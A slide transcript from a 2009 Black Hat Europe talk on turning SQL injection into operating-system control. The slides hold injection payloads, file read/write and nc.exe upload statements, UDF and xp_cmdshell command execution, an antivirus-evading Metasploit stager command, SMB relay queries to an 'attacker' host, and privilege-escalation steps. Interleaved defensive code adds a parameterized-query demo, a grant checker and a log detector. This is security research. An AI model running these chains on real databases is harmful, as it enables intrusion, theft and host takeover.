Advanced SQL injection to operating system full control (slides)
DESCRIPTION
Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet. It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those overlooked and theoretically not exploitable scenarios: from command execution on MySQL and PostgreSQL to a stored procedure buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with the new version of my own tool, which I will release at the conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele). These slides were presented at the Black Hat Europe conference in Amsterdam on April 16, 2009.
TRANSCRIPT
Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
Black Hat Briefings Europe Amsterdam (NL) – April 16, 2009
Who I am
Bernardo Damele Assumpção Guimarães:
• Proud father
• IT security engineer
• sqlmap lead developer
• MySQL UDF repository developer
SQL injection definition
• SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements
• It is a common threat in web applications that lack proper sanitization of user-supplied input used in SQL queries
SQL injection techniques
• Boolean based blind SQL injection:
par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--
• UNION query (inband) SQL injection:
par=1 UNION ALL SELECT query--
• Batched queries SQL injection:
par=1; SQL query;--
How far can an attacker go by exploiting a SQL injection?
Scope of the analysis
• Three database software:
– MySQL on Windows
– PostgreSQL on Windows and Linux
– Microsoft SQL Server on Windows
• Three web application languages:
– ASP on Microsoft IIS, Windows
– ASP.NET on Microsoft IIS, Windows
– PHP on Apache and Microsoft IIS
Batched queries
• In SQL, batched queries are multiple
SQL statements, separated by a
semicolon, and passed to the database
• Example:
SELECT col FROM table1 WHERE
id=1; DROP table2;
Batched queries support
Default support for batched queries in programming languages and their DBMS connectors
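The point of the last three slides is that whether "par=1; SQL query;--" does anything is decided by the connector's default, not by the application code. The following is an added example, not code from the slides or from sqlmap: it uses Python's sqlite3 module as a stand-in for the connectors in the slide's table (an assumption, chosen because it runs offline), builds the slide's "SELECT col FROM table1 WHERE id=1; DROP table2" shape from a concatenated value, and shows a single-statement API rejecting the batch, a batch-capable API executing it, and the parameterized query that is safe under either. The schema, the INJECTED value and all function names are constructed for this example.

```python
import sqlite3

# Constructed sample schema mirroring the slide's example: a lookup table and a
# second table that an injected batched statement could drop.
SCHEMA = """
CREATE TABLE table1(id INTEGER PRIMARY KEY, col TEXT);
INSERT INTO table1 VALUES (1, 'one'), (2, 'two');
CREATE TABLE table2(id INTEGER PRIMARY KEY);
"""

# Constructed attacker-controlled value for the "par" parameter: the batched
# queries shape from the slides, i.e. "1; SQL query".
INJECTED = "1; DROP TABLE table2"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row is not None


def lookup_vulnerable(conn, par, batched_connector):
    # Vulnerable form: the value is concatenated into the statement text.
    # Whether the second statement ever runs is decided by the connector, not
    # by the application: sqlite3's execute() accepts exactly one statement
    # and raises on a trailing one, while executescript() runs the whole batch.
    sql = "SELECT col FROM table1 WHERE id=" + par
    if batched_connector:
        conn.executescript(sql)
        return None
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, par):
    # Hardened form: the value is bound as a parameter and never parsed as SQL,
    # so a statement separator inside it is just part of a string.
    return conn.execute("SELECT col FROM table1 WHERE id=?", (par,)).fetchall()


def demo():
    """Run the three variants against fresh databases and report what survived."""
    results = {}

    conn = make_db()
    try:
        lookup_vulnerable(conn, INJECTED, batched_connector=False)
        results["single_statement_api"] = "batch executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # Older sqlite3 modules raise Warning, newer ones ProgrammingError.
        results["single_statement_api"] = "batch rejected"
    results["table2_after_single"] = table_exists(conn, "table2")

    conn = make_db()
    lookup_vulnerable(conn, INJECTED, batched_connector=True)
    results["table2_after_batch"] = table_exists(conn, "table2")

    conn = make_db()
    results["param_rows_injected"] = lookup_parameterized(conn, INJECTED)
    results["param_rows_legit"] = lookup_parameterized(conn, 1)
    results["table2_after_param"] = table_exists(conn, "table2")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The single-statement API protects table2 only by accident of the connector's default; a driver or framework that batches by default (the case the slide's table is about) runs the DROP. The parameterized lookup returns no rows for the injected value and the right row for a genuine id, and table2 survives in both cases, which is the property to rely on.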
File system read access
File read access on MySQL
• LOAD_FILE() function can be used to
read either a text or a binary file
• Session user must have these privileges:
– FILE
– CREATE TABLE for the support table
File read access on MySQL
Via batched queries SQL injection technique:
SELECT HEX(LOAD_FILE('C:/example.exe')) INTO
DUMPFILE 'C:/WINDOWS/Temp/hexkflwl';
CREATE TABLE footable(data longtext);
LOAD DATA INFILE 'C:/WINDOWS/Temp/hexkflwl'
INTO TABLE footable FIELDS TERMINATED BY
'MFsIgeUPsa' (data);
File read access on MySQL
Via any SQL injection enumeration technique:
• Retrieve the length of the support table's field value
• Dump the support table's field value in chunks of 1024 characters
On the attacker box:
• Assemble the chunks into a single string
• Decode it from hex and write it to a local file
File read access on PostgreSQL
• COPY statement can be used to read a text file
– User-defined function can be used to read a binary file
• Session user must be a super user to call this statement
File read access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data bytea);
COPY footable(data) FROM
'/etc/passwd';
File read access on PostgreSQL
Via any SQL injection enumeration technique:
• Count the number of entries in the support table
• Dump the support table's field entries base64 encoded via ENCODE() function
On the attacker box:
• Assemble the entries into a single string
• Decode it from base64 and write it to a local file
File read access on MS SQL Server
• BULK INSERT statement can be abused
to read either a text or a binary file and save its content on a table text field
• Session user must have these privileges:
– INSERT
– ADMINISTER BULK OPERATIONS
– CREATE TABLE
File read access on MS SQL Server
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
CREATE TABLE footablehex(id INT
IDENTITY(1, 1) PRIMARY KEY, data
VARCHAR(4096));
BULK INSERT footable FROM 'C:/example.exe'
WITH (CODEPAGE='RAW',
FIELDTERMINATOR='QLKvIDMIjD',
ROWTERMINATOR='dqIgILsFoi');
File read access on MS SQL Server
[…]
WHILE (@counter <= @length)
BEGIN
[…]
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(data, @counter, 1)) FROM footable))
[…]
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
[…]
INSERT INTO footablehex(data) VALUES(@hexstr)
END
[…]
File read access on MS SQL Server
Via any SQL injection enumeration technique:
• Count the number of entries in the support table table2
• Dump the support table table2's varchar field entries sorted by the integer primary key
On the attacker box:
• Assemble the entries into a single string
• Decode it from hexadecimal and write it to a local file
File system write access
File write access on MySQL
• SELECT … INTO DUMPFILE clause
can be used to write files
• Session user must have these privileges:
– FILE
– INSERT, UPDATE and CREATE TABLE for the support table
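Slides 10 and 21 each list the MySQL privileges the session user needs for the support-table file read (FILE plus CREATE TABLE) and file write (FILE plus INSERT, UPDATE and CREATE TABLE). The following is an added example, not from the slides or from sqlmap: it parses constructed MySQL SHOW GRANTS output for an application account and reports which of those two primitives the account could reach, the check a reviewer would run on a web application's database user. The grant lines, account names and function names are constructed; the privilege requirements are the ones stated on the slides, and the global-only nature of FILE is MySQL's own rule.

```python
import re
from collections import defaultdict

# Matches one line of MySQL's SHOW GRANTS output, e.g.
#   GRANT SELECT, INSERT ON `shop`.* TO 'app'@'localhost'
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+",
    re.IGNORECASE,
)


def parse_show_grants(lines):
    """Map each scope (*.*, `db`.*, `db`.`table`) to the set of privileges granted on it."""
    grants = defaultdict(set)
    for line in lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        grants[m.group("scope")] |= privs
    return dict(grants)


def has_priv(grants, priv, global_only=False):
    """True if priv (or ALL PRIVILEGES) is held on some scope.

    With global_only=True only the *.* scope counts, which is how MySQL treats
    FILE: ALL PRIVILEGES on a single schema does not include it.
    """
    for scope, privs in grants.items():
        if global_only and scope != "*.*":
            continue
        if priv in privs or "ALL PRIVILEGES" in privs:
            return True
    return False


def assess(grants):
    """Privilege requirements as listed on the slides for the support-table techniques."""
    file_priv = has_priv(grants, "FILE", global_only=True)
    return {
        "file_read": file_priv and has_priv(grants, "CREATE"),
        "file_write": file_priv
        and all(has_priv(grants, p) for p in ("INSERT", "UPDATE", "CREATE")),
    }


# Constructed SHOW GRANTS outputs for four hypothetical accounts.
LEAST_PRIVILEGE = [
    "GRANT USAGE ON *.* TO 'app'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'app'@'localhost'",
]
ALL_ON_ONE_SCHEMA = [
    "GRANT USAGE ON *.* TO 'shopadmin'@'%'",
    "GRANT ALL PRIVILEGES ON `shop`.* TO 'shopadmin'@'%'",
]
OVERPRIVILEGED = [
    "GRANT FILE, SELECT, INSERT, UPDATE, CREATE ON *.* TO 'web'@'localhost'",
]
DBA_ACCOUNT = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]


if __name__ == "__main__":
    for name, lines in [("least-privilege", LEAST_PRIVILEGE),
                        ("all-on-one-schema", ALL_ON_ONE_SCHEMA),
                        ("overprivileged", OVERPRIVILEGED),
                        ("dba", DBA_ACCOUNT)]:
        print(name, assess(parse_show_grants(lines)))
```

The second account is the instructive one: ALL PRIVILEGES on the application's own schema sounds generous but grants nothing on the slides' lists, because FILE exists only at the global level. An application account that needs FILE for a legitimate reason is the exception that deserves a written justification.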
File write access on MySQL
On the attacker box:
• Encode the local file content to its
corresponding hexadecimal string
• Split the hexadecimal encoded string into chunks of 1024 characters each
File write access on MySQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data longblob);
INSERT INTO footable(data) VALUES
(0x4d5a90…610000);
UPDATE footable SET
data=CONCAT(data, 0xaa270000…000000);
[…];
SELECT data FROM footable INTO DUMPFILE
'C:/WINDOWS/Temp/nc.exe';
File write access on PostgreSQL
• Large Object’s lo_export()
function can be abused to write
remote files on the file system
• Session user must be a super user
to call this statement
File write access on PostgreSQL
On the attacker box:
• Encode the local file content to its
corresponding base64 string
• Split the base64 encoded string into chunks of 1024 characters each
File write access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
INSERT INTO footable(data) VALUES ('TVqQ…');
UPDATE footable SET data=data||'U8pp…vgDw';
[…]
SELECT lo_create(47);
UPDATE pg_largeobject SET data=(DECODE((SELECT
data FROM footable), 'base64')) WHERE loid=47;
SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe');
File write access on MS SQL Server
• Microsoft SQL Server can execute commands: xp_cmdshell()
EXEC xp_cmdshell('echo … >> filepath')
• Session user must have CONTROL SERVER privilege
• On the attacker box:
– Split the file in chunks of 64Kb
– Convert each chunk to its plain text debug script format
File write access on MS SQL Server
Example of nc.exe:
00000000 4D 5A 90 00 03 00 00 00
00000008 04 00 00 00 FF FF 00 00
[…]
As a plain text debug script:
n qqlbc // Create a temporary file
rcx // Write the file size in
f000 // the CX register
f 0100 f000 00 // Fill the segment with 0x00
e 100 4d 5a 90 00 03 […] // Write in memory all values
e 114 00 00 00 00 40 […]
[…]
w // Write the file to disk
q // Quit debug.exe
File write access on MS SQL Server
Via batched queries SQL injection technique:
• For each debug script:
EXEC master..xp_cmdshell '
echo n qqlbc >> C:\WINDOWS\Temp\zdfiq.scr &
echo rcx >> C:\WINDOWS\Temp\zdfiq.scr &
echo f000 >> C:\WINDOWS\Temp\zdfiq.scr &
echo f 0100 f000 00 >>
C:\WINDOWS\Temp\zdfiq.scr &
[…]'
File write access on MS SQL Server
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
debug < C:\WINDOWS\Temp\zdfiq.scr &
del /F C:\WINDOWS\Temp\zdfiq.scr &
copy /B /Y netcat+qqlbc netcat'
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
move /Y netcat C:/WINDOWS/Temp/nc.exe'
Operating system access
User-Defined Function
• In SQL, a user-defined function is a
custom function that can be evaluated in
SQL statements
• UDF can be created from shared libraries that are compiled binary files
– Dynamic-link library on Windows
– Shared object on Linux
UDF injection
On the attacker box:
• Compile a shared library defining two UDF:
– sys_eval(cmd): executes cmd, returns stdout
– sys_exec(cmd): executes cmd, returns status
• The shared library can also be packed to speed up the upload via SQL injection:
– Windows: UPX for the dynamic-link library
– Linux: strip for the shared object
UDF injection
Via batched queries SQL injection technique:
• Upload the shared library to the DBMS file system
• Create the two UDF from the shared library
• Call either of the UDF to execute commands
UDF injection on MySQL
UDF Repository for MySQL
• lib_mysqludf_sys shared library:
– Approximately 6Kb packed
– Added sys_eval() to return command
standard output
– Compliant with MySQL 5.0+
– Works on all versions of MySQL from 4.1.0
– Compatible with both Windows or Linux
UDF injection on MySQL
Via batched queries SQL injection technique:
• Fingerprint MySQL version
• Upload the shared library to a file system path where MySQL looks for it
CREATE FUNCTION sys_exec RETURNS int
SONAME 'libudffmwgj.dll';
CREATE FUNCTION sys_eval RETURNS string
SONAME 'libudffmwgj.dll';
UDF injection on PostgreSQL
Ported MySQL shared library to PostgreSQL
• lib_postgresqludf_sys shared library:
– Approximately 6Kb packed
– C-Language Functions: sys_eval() and sys_exec()
– Compliant with PostgreSQL 8.2+ magic block
– Works on all versions of PostgreSQL from 8.0
– Compatible with both Windows or Linux
UDF injection on PostgreSQL
Via batched queries SQL injection technique:
• Fingerprint PostgreSQL version
• Upload the shared library to any file system
path where PostgreSQL has rw access
CREATE OR REPLACE FUNCTION sys_exec(text)
RETURNS int4 AS 'libudflenpx.dll',
'sys_exec' LANGUAGE C […];
CREATE OR REPLACE FUNCTION sys_eval(text)
RETURNS text AS 'libudflenpx.dll',
'sys_eval' LANGUAGE C […];
Command exec on MS SQL Server
xp_cmdshell() stored procedure:
• Session user must have sysadmin role or
be specified as a proxy account
• Enabled by default on MS SQL Server
2000 or re-enabled via sp_addextendedproc
Command exec on MS SQL Server
• Disabled by default on MS SQL Server
2005 and 2008, it can be:
– Re-enabled via sp_configure
– Created from scratch using shell object
Out-of-band connection
OOB connection definition
• Contrary to in-band connections (HTTP), an out-of-band connection uses an alternative channel to return data
• This concept can be extended to establish a full-duplex connection between the attacker host and the database server
• Over this channel the attacker can have a command prompt or a graphical access (VNC) to the DBMS server
A good friend: Metasploit
• Metasploit is a powerful open source exploitation framework
– Post-exploitation in a SQL injection scenario
• SQL injection as a stepping stone for an OOB channel using Metasploit can be achieved
– Requires file system access and command execution via in-band connection – already achieved
OOB via payload stager
On the attacker box:
• Forge a stand-alone payload stager with msfpayload
• Encode it with msfencode to bypass AV
• Pack it with UPX to speed up the upload via SQL injection if the target OS is Windows
OOB via payload stager
Example of payload stager creation and encode:
$ msfpayload windows/meterpreter/bind_tcp EXITFUNC=process LPORT=31486 R | msfencode -e x86/shikata_ga_nai -t exe -o stagerbvdcp.exe
Payload stager compression:
$ upx -9 -qq stagerbvdcp.exe
The payload stager size is 9728 bytes; as a compressed executable its size is 2560 bytes
OOB via payload stager
On the attacker box:
• Run msfcli with multi/handler exploit
Via batched queries SQL injection technique:
• Upload the stand-alone payload stager to the file system temporary folder of the DBMS
• Execute it via sys_exec() or xp_cmdshell()
SMB authentication relay attack
• Initially researched by Dominique Brezinski back in 1996, presented at
Black Hat USA in 1997
• Patched by Microsoft on November 11,
2008 – MS08-068
– It prevents the relaying of challenge keys back to the same host which issued them
SMB relay via SQL injection
• Metasploit has an exploit for this
vulnerability
– Launch the exploit on the attacker box
and wait for incoming SMB connections
• The database server must try to
authenticate to the SMB exploit
– UNC path request can be abused
SMB relay via SQL injection
• MySQL – runs as Local System, no challenge-response password hashes sent:
SELECT LOAD_FILE('\\\\attacker\\foo.txt')
• PostgreSQL – runs as postgres user, unprivileged:
CREATE TABLE table(col text);
COPY table(col) FROM '\\\\attacker\\foo.txt'
SMB relay via SQL injection
• Microsoft SQL Server:
– Session user needs only EXECUTE privilege on the stored procedure – default
– SQL Server 2000 runs as Administrator by default – attack is successful
– SQL Server 2005 and 2008 run often as Network Service – attack is unsuccessful
EXEC master..xp_dirtree '\\attacker\foo.txt'
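Every primitive the slides chain together leaves a distinctive statement in the database's own query log: LOAD_FILE and INTO DUMPFILE on MySQL, COPY ... FROM and lo_export() on PostgreSQL, BULK INSERT, xp_cmdshell and sp_configure on SQL Server, CREATE FUNCTION ... SONAME / LANGUAGE C for the UDF upload, and, for the SMB relay slides just above, a UNC path handed to LOAD_FILE, COPY or xp_dirtree. The following is an added example, not from the slides or from sqlmap: a small rule-based detector run over constructed query-log lines that covers the file read/write, UDF, command execution and UNC-path slides in one pass. The log line format, host names, the SAMPLE_LOG contents and the rule tags are constructed; the statement shapes inside them are the ones on the slides. Which log actually carries statement text (MySQL's general query log, PostgreSQL's log_statement output, SQL Server auditing) depends on the deployment.

```python
import re

# Constructed sample query-log lines: timestamp, host, DBMS, statement text.
SAMPLE_LOG = [
    "2009-04-16 10:00:01 web01 mysql: SELECT name FROM products WHERE id=42",
    "2009-04-16 10:00:02 web01 mysql: SELECT HEX(LOAD_FILE('C:/example.exe')) INTO DUMPFILE 'C:/WINDOWS/Temp/hexkflwl'",
    "2009-04-16 10:00:03 web01 mysql: CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll'",
    "2009-04-16 10:00:04 db02 postgres: COPY footable(data) FROM '/etc/passwd'",
    "2009-04-16 10:00:05 db02 postgres: SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe')",
    "2009-04-16 10:00:06 db03 mssql: EXEC master..xp_cmdshell 'echo n qqlbc >> C:\\WINDOWS\\Temp\\zdfiq.scr'",
    "2009-04-16 10:00:07 db03 mssql: EXEC master..xp_dirtree '\\\\attacker\\foo.txt'",
    "2009-04-16 10:00:08 db03 mssql: SELECT TOP 10 * FROM orders WHERE customer_id=7",
]

# (tag, pattern) pairs; each pattern matches one primitive the slides rely on.
# Tags are constructed names for this example.
RULES = [
    ("mysql-file-read",     r"\bLOAD_FILE\s*\(|\bLOAD\s+DATA\s+(?:LOCAL\s+)?INFILE\b"),
    ("mysql-file-write",    r"\bINTO\s+(?:DUMPFILE|OUTFILE)\b"),
    ("udf-create",          r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*?(?:\bSONAME\b|\bLANGUAGE\s+C\b)"),
    ("postgres-file-io",    r"\bCOPY\b.*?\b(?:FROM|TO)\s+'"),
    ("postgres-file-write", r"\blo_export\s*\("),
    ("mssql-file-read",     r"\bBULK\s+INSERT\b"),
    ("mssql-cmd-exec",      r"\bxp_cmdshell\b"),
    ("mssql-reconfigure",   r"\bsp_configure\b|\bsp_addextendedproc\b|\bxp_regwrite\b"),
    # Two or more backslashes, a host name, then a separator: a UNC path, which
    # makes the database server authenticate outbound over SMB (relay slides).
    ("unc-path",            r"\\{2,}[\w.-]+\\+"),
]
COMPILED = [(tag, re.compile(pat, re.IGNORECASE)) for tag, pat in RULES]


def classify(line):
    """Return the tags whose pattern matches the line, in rule order."""
    return [tag for tag, rx in COMPILED if rx.search(line)]


def scan(lines):
    """Return (index, tags) for every line that triggered at least one rule."""
    flagged = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            flagged.append((i, tags))
    return flagged


def summarize(lines):
    """Count how often each tag fired across the whole log."""
    counts = {}
    for _, tags in scan(lines):
        for tag in tags:
            counts[tag] = counts.get(tag, 0) + 1
    return counts


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(tags)} :: {SAMPLE_LOG[i]}")
    print(summarize(SAMPLE_LOG))
```

The rules are deliberately narrow: an application account that never legitimately issues these statements should produce zero hits, so a single match from the web tier's connection is worth an alert rather than a threshold. Where an application does use COPY or BULK INSERT legitimately, scope the rule to the session user or source host instead of dropping it.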
Stored procedure buffer overflow
• Discovered by Bernhard Mueller on December 4, 2008
– sp_replwritetovarbin heap-based buffer overflow on Microsoft SQL Server 2000 SP4 and Microsoft SQL Server 2005 SP2
• Patched by Microsoft on February 10, 2009 – MS09-004
Buffer overflow exploit
• Session user needs only EXECUTE privilege
on the stored procedure – default
• Guido Landi wrote the first public stand-alone exploit for this vulnerability
– I added support for multi-stage payload and integrated it in sqlmap
Data Execution Prevention
• DEP is a security feature that prevents
code execution in memory pages not
marked as executable
• It can be configured to allow exceptions
• Default settings allow exceptions:
– Windows 2003 SP1+: OptOut
– Windows 2008 SP0+: OptOut
Bypass DEP
• When it is set to OptOut:
– Exception for sqlservr.exe in the registry
• Via bat file by calling reg
• Via reg file by passing it to regedit
• Via master..xp_regwrite
– Upload and execute a bat file which executes sc to restart the process
Privilege escalation
Windows Access Token abuse
• OS user privilege escalation via
Windows Access Token abuse is
possible also via SQL injection
• If the database process’ user has access
tokens, they can be abused to execute commands as another user, depending
on its token handlers
Meterpreter extension: incognito
• Luke Jennings’ incognito extension for Meterpreter can enumerate user’s access tokens and impersonate a specific token
• Privilege escalation to Administrator or Local System if the corresponding token handler is within the thread of the process where meterpreter is running
Churrasco
• Churrasco is a stand-alone executable
to abuse Access Tokens developed by
Cesar Cerrudo
– Brute-forces the token handlers within
the current process
– Runs the provided command with the brute-forced SYSTEM token
Access Token abuse via SQL injection
• Network Service has access tokens
– Microsoft SQL Server 2005 and 2008
• Churrasco can be uploaded to the
database server file system and used in
the context of the out-of-band connection
attack to execute the payload stager as SYSTEM
Credits
• Guido Landi
• Alberto Revelli
• Alessandro Tanasi
• Metasploit development team
• More acknowledgments and references
on the white paper
Questions?
Thanks for your attention!
Bernardo Damele Assumpção Guimarães
http://bernardodamele.blogspot.com
http://sqlmap.sourceforge.net